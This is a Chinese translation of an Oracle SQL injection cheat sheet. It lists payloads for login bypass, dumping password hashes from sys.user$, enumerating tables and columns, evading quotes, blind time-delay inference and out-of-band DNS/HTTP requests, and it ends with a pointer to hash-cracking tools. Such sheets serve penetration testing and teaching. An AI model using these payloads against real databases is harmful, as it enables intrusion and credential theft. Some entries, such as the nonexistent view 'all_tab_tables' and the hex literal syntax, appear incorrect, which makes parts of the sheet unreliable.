翻译:SQL注入之Oracle篇。
Oracle
默认数据库
SYSTEM —— 所有版本均可用(Available in all versions)
SYSAUX —— 所有版本均可用(Available in all versions)
注释
以下语法可用于注释掉语句的其余部分
-- SQL comment
例子
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
版本
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
注意:在 Oracle 中,所有 SELECT 语句都必须包含一个表;dual 是一个可用于测试的虚拟表。
数据库凭证
SELECT username FROM all_users; Available on all versions
SELECT name, password from sys.user$; Privileged, <= 10g
SELECT name, spare4 from sys.user$; Privileged, <= 11g
数据库名
当前数据库
SELECT name FROM v$database;
SELECT instance_name FROM v$instance
SELECT global_name FROM global_name
SELECT SYS.DATABASE_NAME FROM DUAL
用户数据库
SELECT DISTINCT owner FROM all_tables;
服务器主机名
SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;
表和列
获取表
SELECT table_name FROM all_tables;
获取列
SELECT column_name FROM all_tab_columns;
根据表名查找列
SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';
根据列名查找表
SELECT table_name FROM all_tab_tables WHERE column_name = 'password';
一次获取多张表
SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;
避免使用引号
与其他关系型数据库不同,Oracle 允许对表/列名进行编码。
SELECT 0x09120911091 FROM dual; Hex Encoding.
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() Function.
字符串连接
SELECT 'a'||'d'||'mi'||'n' FROM dual;
条件语句
SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual
时间延迟
SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;
严重时间延迟
AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));
权限
SELECT privilege FROM session_privs;
SELECT grantee, granted_role FROM dba_role_privs; (Privileged)
带外通道
DNS 请求
SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;
密码破解
可使用 Metasploit 模块或 JTR。